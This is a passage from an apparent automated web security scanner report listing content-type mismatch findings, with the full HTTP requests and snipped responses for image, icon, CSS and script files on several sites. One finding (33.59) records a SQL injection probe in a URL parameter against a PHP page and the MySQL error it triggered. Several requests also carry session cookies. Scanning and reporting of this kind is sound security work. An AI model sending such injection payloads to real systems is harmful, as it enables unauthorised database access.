Content-Type: image/jpeg
Last-Modified: Tue, 20 Jun 2006 22:48:19 GMT
Accept-Ranges: bytes
ETag: "298746a0bb94c61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:28:54 GMT
Content-Length: 48933

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2006:06:20 15:48:10.................
...[SNIP]...
33.45. http://www.advisorsquare.com/new/asframeless02/banner_bus02.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asframeless02/banner_bus02.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asframeless02/banner_bus02.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 31 May 2006 17:24:30 GMT
Accept-Ranges: bytes
ETag: "6f134213d784c61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:29:00 GMT
Content-Length: 133639

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2006:05:31 08:36:09.................
...[SNIP]...
33.46. http://www.advisorsquare.com/new/asle04/L3company_pict1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/L3company_pict1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/L3company_pict1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 31 Jan 2007 21:24:04 GMT
Accept-Ranges: bytes
ETag: "6858f8217e45c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:33 GMT
Content-Length: 34904

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:12 14:08:18.................
...[SNIP]...
33.47. http://www.advisorsquare.com/new/asle04/L3company_pict2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/L3company_pict2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/L3company_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 31 Jan 2007 21:24:04 GMT
Accept-Ranges: bytes
ETag: "6858f8217e45c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:41 GMT
Content-Length: 34422

......JFIF.....H.H.....sExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:12 14:07:50.................
...[SNIP]...
33.48. http://www.advisorsquare.com/new/asle04/L3links_pict1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/L3links_pict1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/L3links_pict1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 31 Jan 2007 21:24:04 GMT
Accept-Ranges: bytes
ETag: "c3bafa217e45c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:49:00 GMT
Content-Length: 30523

......JFIF.....H.H.....oExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:12 14:02:51.................
...[SNIP]...
33.49. http://www.advisorsquare.com/new/asle04/L3links_pict2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/L3links_pict2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/L3links_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 31 Jan 2007 21:24:04 GMT
Accept-Ranges: bytes
ETag: "1e1dfd217e45c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:57 GMT
Content-Length: 31831

......JFIF.....H.H.....rExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:12 14:01:59.................
...[SNIP]...
33.50. http://www.advisorsquare.com/new/asle04/L3products_pict1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/L3products_pict1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/L3products_pict1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 31 Jan 2007 21:24:04 GMT
Accept-Ranges: bytes
ETag: "1e1dfd217e45c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:37 GMT
Content-Length: 27622

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:12 14:01:34.................
...[SNIP]...
33.51. http://www.advisorsquare.com/new/asle04/home_01.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/home_01.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/home_01.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 18 May 2005 18:43:38 GMT
Accept-Ranges: bytes
ETag: "f8d07281d95bc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:48 GMT
Content-Length: 7679

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
.......#...H...................    ...    .......

.

.......................................................................................
...[SNIP]...
33.52. http://www.advisorsquare.com/new/asle04/home_02.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/home_02.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/home_02.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 18 May 2005 18:43:38 GMT
Accept-Ranges: bytes
ETag: "53337581d95bc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:09 GMT
Content-Length: 6151

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
......
........................    ...    .......

.

.......................................................................................
...[SNIP]...
33.53. http://www.advisorsquare.com/new/asle04/home_03.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/home_03.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/home_03.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 18 May 2005 18:43:38 GMT
Accept-Ranges: bytes
ETag: "53337581d95bc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:59 GMT
Content-Length: 5723

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
......
........W...............    ...    .......

.

.......................................................................................
...[SNIP]...
33.54. http://www.advisorsquare.com/new/asle04/place_banner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/place_banner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle04/place_banner.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 18 May 2005 17:50:05 GMT
Accept-Ranges: bytes
ETag: "bf31f6d25bc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:37 GMT
Content-Length: 26459

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
......#...D...gW...............    ...    .......

.

.......................................................................................
...[SNIP]...
33.55. http://www.advisorsquare.com/new/asle05/HP_pict2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle05/HP_pict2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle05/HP_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 17 Jan 2007 01:09:50 GMT
Accept-Ranges: bytes
ETag: "61d0cf2fd439c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:13 GMT
Content-Length: 25981

......JFIF.....H.H.....MExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Windows.2006:02:17 10:31:20.........
...[SNIP]...
33.56. http://www.advisorsquare.com/new/asle05/asle05_banner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle05/asle05_banner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle05/asle05_banner.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 17 Jan 2007 18:54:23 GMT
Accept-Ranges: bytes
ETag: "71612ee7683ac71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:59 GMT
Content-Length: 10772

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................d. ..
...[SNIP]...
33.57. http://www.advisorsquare.com/new/asle05/menubg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle05/menubg.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asle05/menubg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 17 Jan 2007 01:52:10 GMT
Accept-Ranges: bytes
ETag: "94fedc19da39c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:02 GMT
Content-Length: 8293

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2007:01:16 17:51:59.................
...[SNIP]...
33.58. http://www.agentadvantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agentadvantage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.agentadvantage.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IS2_Rules_5371=21080%602%60%600%60%60100%601%60%60%600%60%60%60%603%6060%60%60%601%6017600%6022758%6020%601%60%60%60%60%5E%5E%5E21081%602%60%600%60%60100%601%60%60%600%60%60%60%603%6060%60%60%601%6017601%6022785%6020%601%60%60%60%60; IS2_MatchHistory=%20; IS2_StoredValues=TestServers%60designdev.homes.com+wayne.homes.com+advancedaccess.com%2CPrevOfferCount%600%2CPrevOfferTime%600%2CLastRuleIDTriggered%600%2CRuleTriggered%600%2CTimeSinceLastCheck%600; WT_FPC=id=21edcd6a82a42414a101304725196802:lv=1304725196802:ss=1304725196802; s_cc=true; s_evar2=7%3A30PM; s_evar3=Friday; s_evar4=Weekday; s_nr=1304725196830; s_lv=1304725196831; s_lv_s=First%20Visit; s_vnum=1307317196832%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; __utmz=238395408.1304725197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238395408.2045346252.1304725197.1304725197.1304725197.1; __utmc=238395408; __utmb=238395408.1.10.1304725197

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:35 GMT
Server: Apache/2.0.59 (CentOS)
Last-Modified: Tue, 11 Aug 2009 12:15:16 GMT
ETag: "150eea-47e-a7badd00"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ..........................................x'..x'......x'a.x'..x'..x'o.x'&.............................x'C.x'..x'Q.....x'..x'..x'..x'..x'f.x'......................x
...[SNIP]...
33.59. http://www.angege.com/links.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.angege.com
Path:   /links.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /links.php?data=rSe_2%2F%7B02%253%21%2F0%29%24S%5C7%5ElPah%5ErcY%5Eh%24%5Dm%5C%5Eb%27%29%2B%2C2%FE%2A+igN5%2B%276%22%28%2F%2C5+%2C&serverfile=popdirect&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&subid=117412&tid=1288057764&clater=0&m=127&o=1&c=32767&a=32767&q=6&s=%3C%3D&ah=10&al=2&l=english&campaign=3&rurl=http%3A%2F%2Fads.lzjl.com%2FnewServing%2Fclicktrack.php%3Fcpx%3Dcpv%26qid%3D1288057764390track&defurl=http%3A%2F%2Fads.lzjl.com%2FnewServing%2Fcpalinks.php%3Fqid%3D1288057764390track%26memkey%3D98b14fa99412193eba9071f7c8c32be7%26clck_sid%3D4620%26clck_pid%3D2860 HTTP/1.1
Host: www.angege.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:45:51 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.2.4
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 226

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
...[SNIP]...
33.60. http://www.btamericascareers.com/furniture/IT_WhatsInItForYou.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.btamericascareers.com
Path:   /furniture/IT_WhatsInItForYou.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /furniture/IT_WhatsInItForYou.gif HTTP/1.1
Host: www.btamericascareers.com
Proxy-Connection: keep-alive
Referer: http://www.btamericascareers.com/for_you/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ds6ijcbm25s1el485ek4fhmhn7; __utmz=1.1304724283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2052460901.1304724283.1304724283.1304724283.1; __utmc=1; __utmb=1.2.10.1304724283

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:24:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 17 Mar 2008 11:14:52 GMT
ETag: "9e018b-481b-20f90300"
Accept-Ranges: bytes
Content-Length: 18459
Connection: close
Content-Type: image/gif

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...
33.61. http://www.caribbean-ocean.com/styles.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /styles.css

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /styles.css HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:32:54 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1526

/*

styles.css

*/

body {
   margin-top:0px;
   margin-bottom:0px;

   /*background-color:rgb(0, 0, 0); testing! */
}

body, div, a:link, a:active, a:visited, .menu-items {
   font-family:Verdana;
   font-siz
...[SNIP]...
33.62. http://www.caribbean-ocean.com/tabs.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /tabs.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /tabs.js HTTP/1.1
Host: www.caribbean-ocean.com
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*
Pragma: no-cache
Referer: http://www.caribbean-ocean.com/
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Connection: Keep-alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:14 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 910

/*

tabs.js

*/


function switchTabs(tabName)
{
   // set all divs to none -- could clear this up as below
   var divs = document.getElementsByTagName('div');

   for(var i = 0; i < divs.length
...[SNIP]...
33.63. http://www.dhmiservices.com/ClickContact/js.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dhmiservices.com
Path:   /ClickContact/js.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ClickContact/js.ashx?Agent=950b13d4-72fe-46ca-891d-8922b0525b3e&img=http%3A%2F%2Fwww.dhmiservices.com%2FImageHandler.ashx%3Fimg_id%3D3824 HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 623
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:39:55 GMT; path=/

function load565509113() {
var load = window.open('http://950b13d4-72fe-46ca-891d-8922b0525b3e.dhmiservices.com/ClickContact/popup.aspx?var1=950b13d4-7
...[SNIP]...
33.64. http://www.dominionenterprises.com/site/scripts/qm_slide_effect.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /site/scripts/qm_slide_effect.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /site/scripts/qm_slide_effect.js HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:46 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
Last-Modified: Fri, 22 Jun 2007 00:08:43 GMT
ETag: "1bc23c-b5c-775298c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 2908

qmad.slide=new Object();qmad.bvis+="qm_slide_a(b.cdiv);";qmad.bhide+="qm_slide_a(a,1);";qmad.br_navigator=navigator.userAgent.indexOf("Netscape")+1;qmad.br_version=parseFloat(navigator.vendorSub);qmad
...[SNIP]...
33.65. http://www.dynamicperimeter.com/styles/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dynamicperimeter.com
Path:   /styles/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /styles/favicon.ico HTTP/1.1
Host: www.dynamicperimeter.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pdpr=googletokenization; _mkto_trk=id:797-PWY-691&token:_mch-dynamicperimeter.com-1304748966091-92085; __utmz=41619767.1304748968.1.1.utmgclid=CMLLqMvV1KgCFUSo4AodlBcAgw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=41619767.809234018.1304748968.1304748968.1304748968.1; __utmc=41619767; __utmb=41619767.1.10.1304748968

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:21:37 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 08 Mar 2011 09:28:03 GMT
ETag: "3381bc-47e-3aa0aec0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
33.66. http://www.expedia.com/daily/js/flash.vbs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/js/flash.vbs

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /daily/js/flash.vbs HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Cteonnt-Length: 296
Content-Type: text/vbscript
